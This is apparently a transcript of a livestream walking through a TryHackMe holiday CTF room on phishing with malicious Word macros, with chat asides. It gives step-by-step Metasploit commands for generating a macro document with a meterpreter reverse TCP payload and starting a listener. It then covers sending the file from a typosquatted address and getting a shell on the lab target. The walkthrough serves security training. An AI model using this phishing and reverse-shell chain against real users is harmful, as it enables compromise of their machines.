Day 10. He had a brain full of macros and had shells in his soul. The story. Mayor Malware had just one Suckmas wish. The Suck organizer would fail for his fish. Well, on top of this, he wanted as well. Once the email opened, to gain a raw shell. Mayor Malware attempts to phish one of the Suckmas organizers by sending a document embedded with the malicious macro. Once opened, the macro will execute, giving Mayor remote access to the organizer's system. So, it's phishing. Funny image this time, right? Martha May Ware is surprised that her system was compromised after following tight security, but McSkitty thinks she traced the attacker, and he got in. It's none other than Mayor Malware who got into the system. This time, the mayor used phishing to get his victim. McSkitty's quick incident response prevented significant damage. In this case, you will run a security assessment against Martha May Ware. The purpose would be to improve her security and raise her cyber security awareness against future attacks. Glitch is still concerned about any future attack on Martha May Ware and advises McSkitty to run a phishing exercise on her to verify whether she's vigilant about these attacks. So, learning objectives. Understand how phishing attacks work. Discover how macros in documents can be used and abused. Learn how to carry out a phishing attack with a macro. Phishing attacks. Security is as strong as the weakest link. Many would argue that humans are the weakest link in the security chain. It's easier to exploit a patch system behind a firewall, or is it easier? Or to convince a user to open an important document. Hence, human hacking is usually the easiest to accomplish and falls under social engineering. Phishing is a play on the word fishing. However, the attacker is not after seafood. Phishing works by sending a bait to a usually large group of target users. Furthermore, the attacker often crafts their message with a sense of urgency, prompting target users to take immediate action without thinking critically, increasing the chances of success. The purpose is to steal personal information or install malware, usually by convincing the target user to fill out a form, open a file, or click a link. One might get an email out of nowhere claiming that they are being charged a hefty sum and that they can check the details in the attached file or URL. The attacker just needs to have their target users open the malicious file or view the malicious link. This can trigger specific actions that would give the attacker control over your system. Macros. So, this is what we'll do, I'm assuming. The needs of Microsoft Office users can be vastly different, and there's no way that a default installation would cater to all of these needs. In particular, some users find themselves repeating the same tasks, such as formatting or inserting text or performing calculations. Consider the example of number to words conversion, where a number such as 1337 needs to be expressed as 1337. It would take hours to finish if you have hundreds of numbers to convert. Hence, there is a need for an automated solution to save time and reduce manual effort. In computing, a macro refers to a set of programmed instructions designed to automate repetitive tasks. MS Word, among other MS Office products, supports adding macros to documents. In many cases, these macros can be a tremendous time-saving feature. However, in cybersecurity, these automated programs can be hijacked for malicious purposes. To add a macro, I'm thinking more like the functionality can be hijacked, right? To add a macro to an MS Word document, for instance, we click on the View menu and then select Macros, as pointed out by 1 and 2. In the screenshot below, we will specify the name of the macro and specify that we want to save it in our current document, as indicated by 3 and 4. Finally, we press the Create button. Let's explore one way an attacker could create a MS Word document with an embedded macro to gain access to Marta's system. Attack plan.
Tulrago says, "Hi, have a good streams."
Thank you. So, good morning or good night? I don't know what time you're in. So, for me it's morning. Well, I guess 9:47 morning-ish, right? So let's see what their attack plan is, or rather, Mayor Malware, right? In his plans, Mayor Malware needs to create a document with a malicious macro. Upon opening the document, the macro will execute a payload.
Morning time from Turkey.
Ah, nice. Yeah, so it's starting to close up to real Christmas, yeah? So we're already at the 11th. Time's just flying by. Time to get some Christmas presents, really. So, you need to create a document with a malicious macro. Upon opening the document, the macro will execute a payload and connect to the mayor's machine, giving remote control. Consequently, the mayor needs to ensure that he's listening for incoming connections on his machine before emailing the malicious document.
Can I ask for one career advice?
Yeah, sure, but I'm not working in this area yet, so... But feel free to ask anything I can help with, I will. So, he needs to open it for listen to connection before emailing, or it wouldn't receive the connection back, right? By executing the macro, the mayor gains remote access to Marta's system through a reverse shell, allowing him to execute commands and control her machine remotely. The steps are as follows. Create a document with a malicious macro. Start listening for incoming connections on the attacker system. Email the document and wait for the target user to open it. The target user opens the document and connects to the attacker system. And then control the target user's system. I guess receive the connection. There. You might wonder why you don't set the malicious macro so that you can control the target system directly instead of the other way around. The reason is that the target system is behind a firewall or has a private IP address. You cannot reach it, and hence you cannot connect to it. So, what do we need today? I'm very happy to see there's no split screen available. We need the VM, and we need a recovery machine. So we updates with the IP. So I really don't like using the attack box, but I guess we will click this and see where it leads, and we'll see if we can do stuff on ours, or we have to use the attack box. this is also not a nice way to read stuff. Right, I was thinking I usually zoom this so it's easier to read on stream if you're on your phone or whatever, you know. But yesterday we had a split screen where I zoomed down to 100%, so that's why it's so tiny. So we need to be able to create a macro. And I'm assuming they have stuff prepared on the attack box for this. But we can just, as soon as this has started, we can open it in full screen and hop it to the other screen so we can read better too. So, on the attack box, you need to carry out 2 steps. Create a document with an embedded malicious macro. Listen for incoming connections. So, we could always listen for incoming connections on our machine at least. Not that it matters. Creating the malicious document. The first step would be to embed a malicious macro within the document. Alternatively, you can use Metasploit framework to create such a document. This will spare us the need for a system with MS Office. Yeah, so maybe we can do. So we're starting this for nothing, maybe. We'll see. So that's why I was thinking, yeah, maybe I should start it just to save time and we won't need it. Should have read a few extra lines here. Because this is also a possibly MS Office free version. Yeah, MSF console. Created a macro enabled document. Yeah, it's just using MSF console. I'm just checking what we'll need. The attack box doesn't have MS Office installed, so this section is only for read along, meaning this is not, we didn't need this because it doesn't have MS Office either, just as our machine. Yeah, let's just in case, so we don't have to redo this, let's keep it open in the background there, and minus this one. So we're back to the way it looked. I'm so sorry for the mess. But I don't read these ahead, you know. I'm just going along with whatever happens. So now, might be able to read this on the phone, right? That's what I'm going for. Creating the malicious document. The first step would be to embed a malicious macro within the document. Alternatively, you can use the Metasploit framework to create such a document, as this would spare us the need for a system with MS Office. And I don't have a system with MS Office. You will use the Metasploit framework to create the document with a malicious macro. The rest requires the following commands. Open a new terminal. So we already have, but not on on our Kali machine, right? So let's just run it. So we're actually doing MSF console this time. I'm thinking MSF Venom, right? So let's read while it's loading. Set payload, Windows Meterpreter reverse TCP. specify the payload to use. In this case, it connects to the specified host and creates a reverse shell. Use exploit multi-file format, Office, Word, Macro.
Toolrago says, thanks for advice. I was thinking to start from this video list, web link.
Okay, sure. Let's click that. So, course introduction. Pen testing. Okay, yeah, this is probably a good introduction. I haven't looked at it anything. It's also 5 years old, so you might want to look at a newer one since you're thinking of AI stuff, right? So I don't think anything 5 years old would look at AI. But if you're just thinking generally, I think the same people probably have a newer one. Yeah. There's probably better stuff on YouTube that's more updated. So, check the age a bit. But the basics will probably be the same. So our MSF console has started. So let's actually copy these lines. I've typed these before, so I don't need to practice them. So, and use.
Okay, I will check. Thanks for all.
Yeah, sure. Oh, you're welcome. This specifies the exploit you want to use. Technically speaking, this is not an exploit. This is a module to create a document with a macro. So this is what we want then. Because I was thinking, why MSF console? But MSF venue, you can only select one thing, right? You can't do this. This is interesting. We'll probably get a file from this, which I didn't know this. I always love when I get to learn new things, especially things we could use. So this is perfect. Then we have the options. So let's set lhost and the IP address of the attacker system. They have filled in the attack box IP, but we're going to use our IP instead here, because they think we're going to use the attack box. So 10.21.31.111, that's the IP that we have on TryHackMe's VPN. So there, and then we do set the port. So the port number you're going to listen to, and they're using 8888, and we'll just do 443, but we have to do set L port, and I think L port is not case sensitive too. Then we show the options to see if we have set everything we need. And we get some more information also. So, custom template, user share Metasploit framework, data, exploits Office Word macro, template docx. A docx file that will be used as a template to build up the exploit. So, that's interesting. We have the template here if we wanted to modify it ourselves. File name, FSM. MSF.docm, office document macro file docm. Okay, payload options, exit func, exit technique accepted, thread process known. So these are the options that we could possibly have, and it's a thread here. So it's already set for us, we don't have to set it, and then we set these. No handler will be created. which is nice because I think it will just create a file, right? So exploit target Microsoft Office Word on Windows. So let's see what else it says. Exploit generates a macro and embeds it in a document. So it will now generate with our information, right? So the point of this is it will put these reverse shell, reverse TCP, interpreter. Right, we selected that. I don't like interpreter, but okay. Let's follow along, right? So I will probably do this with a normal one later, just to have it done, right? Have finished files ready to use. But otherwise, we need probably to change the IP depending on if it's on different thingies. So, I mean, what IP address we have. Let's just do it. Let's do run or exploit. Using template, use our share Metasploit framework data exploits Office Word macro template docx, injecting payload in document comments, injecting macro and other required files in document, finalizing docum, msf.docum. msf.docum is stored at home Kali.msf4 local msf4 docum. So this path here is kind of interesting for us now then. So let's just copy this bit. msf4 local, right? This is the path. So let's open a new one and cd to this. And let's look here. There's our file. So I knew of a tool to look at these files, but I don't remember it. So I'm really hoping that we'll do it again here, or I'll have to Google later because I want that tool in my notes. I don't know why I didn't put it in the notes when I had it. So in the terminal below, you can see the execution. So we already did it ourselves. They're just exiting it here afterwards. As you can see, the Word document with embedded macro has been created in the created macro-enabled document. We mentioned earlier how to create a macro within an MS Word document. You might be interested to see the content of the file created by MSF console. In the screenshot below, we can see the different procedures and functions that make up the macro. Note that attack bots don't have MS Office installed, so this section you only have to read along. Meaning we can't do it ourselves if we don't have MS Office. Auto open triggers the macro automatically when a Word document is opened. It searches through the document's properties looking for the content in the comments field. The data saved using base64 encoding in the comments field is actually the payload. So we have sub auto open. Oh, so long since I read this. On errors next, dim found value string for each prop in active document built-in document properties. If prop name is comments, then we get data, we base64 decode it, and if Mac, execute for OS, else execute for Windows. So there's functions here, OS X, I mean. So it's checking if it's Mac. And then they have the execute for Windows one. Create a scripting file system object. So many years I worked with this. So get folder, put together a file name, create text file, write it, close it, create object, vscript shell, run it, and OS X is a echo code and Python app. Okay. The code. Okay, so the base64 code was not in there instead either, but it's actually a function that they have created also in the macro from Metasploit framework. So base64 code converts a payload to its original form. In this case, it is an executable MS Windows file. Execute for Windows, execute the payload in a temporary directory. It connects to the specified attacker system IP address and port. So we still haven't seen the actual code for the exploit as it's in the comments, loaded from there. The command field is shown in the screenshot below. This is close to 100,000 characters in our case, so we won't be able to see it and decode it ourselves. We don't need to, right? We can always look in our document. If you copy it and save it to a text file, you can convert it to its original executable format using base64 as shown below. So you just send it into the payload exe. And we could also do the reverse. Base64 our encode an exe payload and put it into the comments and use their script to get it into the macro. Just put it in the comments, right? So we could just put anything in there if we wanted. You already expect this file to connect to the specified IP and port. If you would like to check its behavior in the sandbox, you can check this virus total report for a file that we created and uploaded. In this case, it attempts to connect to 10.9.18.120. So, process is created, payload exe, and shell commands, payload exe, process 3, payload exe. Highlighted actions, and here we can see that a Metasploit connect and something called Rosino connect to the port in IP. So we'll have to start listener, and since it's MetaPrayer, it needs to be in MSF, so I don't know why they exited it before, but we didn't. We will again use the Metasploit framework, but this time to listen for incoming connection when a target user opens phishing Word document. This requires the following commands. Open a new terminal window and run MSF console to start Metasploit framework. Use multi-handler to handle incoming connections. So let's hop over to our other tab here, and let's instead use multi-handler. And we're doing that instead. And then we set payload, Windows, interpreter, reverse TCP. So I guess they could have added creating a handle at the same time here, but you usually would prepare this in advance, so I understand why they did it like this. It's logical. This is I'm just continue reading the text here too, so we don't miss any bits. To ensure that our payload works with the payload used when creating the malicious macro. Yeah, so we can't just listen with netcat when we have a meterpreter payload. It wouldn't work. So we need to put our IP, not this one. So let's just click on the wrong machine there. Oh. Let's do options first, right? So we don't need to say show options. Options is enough. So payload options. Here we can see what we need to fill in here, right? And their default is 4444. So we need to set lhost to, and then I'm just having it here so I can see the IP. So 10.21.31.11, quite a fun IP there. Set lhost specifies the IP number of the attacker system. It should be the same as the one used when creating the document. Set port 8888, because that's what they used. Specifies the port number you're going to listen to on, and should be the same as the one you used when creating the document. So we could have used 8888. You know, it doesn't matter, but we didn't, so we used set lport 443 there. And then we can do options again, and now these values should be filled in. Oh gosh, I missed the S. That's what happened. There. So now you can see we have these filled in because we entered them. And it's time to start listening for incoming connections to establish the reverse shell. So when the document is opened, we need already to be listening, or we won't receive the connection. So I have to click before I type. There, we started. So started reverse TCP handler on 10.21.31.11:443. So the only thing to make sure here is that we're not already using the port. If we were, it wouldn't be able to start. So there. Since we did it, this is just the output from running the commands. So email the malicious document. The malicious document has been created. All you need to do is to send it to the target user. It is time to send an email to the target user, marta@socmas.thm. Mayor Malware has prepared the following credentials. Notice that Mayor Malware uses the domain name that looks similar to the target. So instead of Socmas, it says Socnas.thm, right? This technique is known as typo squatting, where attackers create domain names that are nearly identical to legitimate ones in order to trick victims. On the attack box, start the Firefox web browser and head to HTTP. So now we're going to use this machine we started here. And log in. We're going to use it to send the mail. So we copy this. We head over to our browser. So I haven't even full screen it. So I'm just gonna turn off burp here, or rather turn off the proxy. So yeah, that was yesterday or something. No, the day before, or the day before. So here we can log in with the credentials. It was info at saknas .thm, and the password was Merry Fishmas. Merry Fishmas exclamation mark. So let's sign in. Once log in, compose an email to the target user and don't forget to attach the document you created. Changing the name to something more convincing, such as invoice document or receipt document, might be a good idea. Also, write a couple of sentences explaining that you are attaching, what you are attaching, to convince Martha Mayware to open the document. Note: you can use Ctrl H on the file upload pop-up to be able to see .msf4 directory. Oh, Ctrl H to see hidden where your email is located. Yeah, so let's see. We have our email. So we want to create a new message. And we want to send it to Martha at sakmas.thm, right? Important document. We don't have to be very please check. Please, well, we're good with that, right? So we need to attach, here, add attachment. So, so by default, we can't see hidden ones. I never thought of that. I always do LSLA, you know. I'm not used to the graphical stuff. There we can see them. That's it. That's a good learning point. We should put that in the notes. So as I would have normally, I would have just typed it, of course, but so MSF4 and let's just look here because we already have it open. Local. Yeah, I was thinking local. So local MSF4. So the document is attached. Let's here's the document you requested. So let's see what they say. If they're saying anything more, you know, because sometimes they want special stuff as this is automated. I don't think there's anything more. Exploitation. If everything works out, you will get a reverse shell after about 2 minutes. So send it quickly is the thing. So these are always a bit funny. I think I'll have to click twice since I wasn't in the VM. So we're expecting expecting a response to this one. So meanwhile, let's check their stuff here. Start and reverse TCP handler. This is ours. What we did. So this is what we will receive in 2 minutes. So there. It was nicely enough faster than that. So now we're in their machine, and we're supposed to. The flag is a value inside the flag.txt located at the administrator's desktop. So let's see if we have access to that now, or if we need to do anything more. But I'm kind of assuming this is just getting the file, right? So let's see the C colon users, and let's see what's here. We have only the administrator. No, I'll have to type it all if I can't spell administrator. There, you shouldn't pause in the middle of typing something. It's not good. CD desktop. It's not case sensitive. It's Windows. So here we should have a flag. So we should be able to type the flag.txt. There. So here's our flag. So that was not a long room or a long task. There's a phishing room though.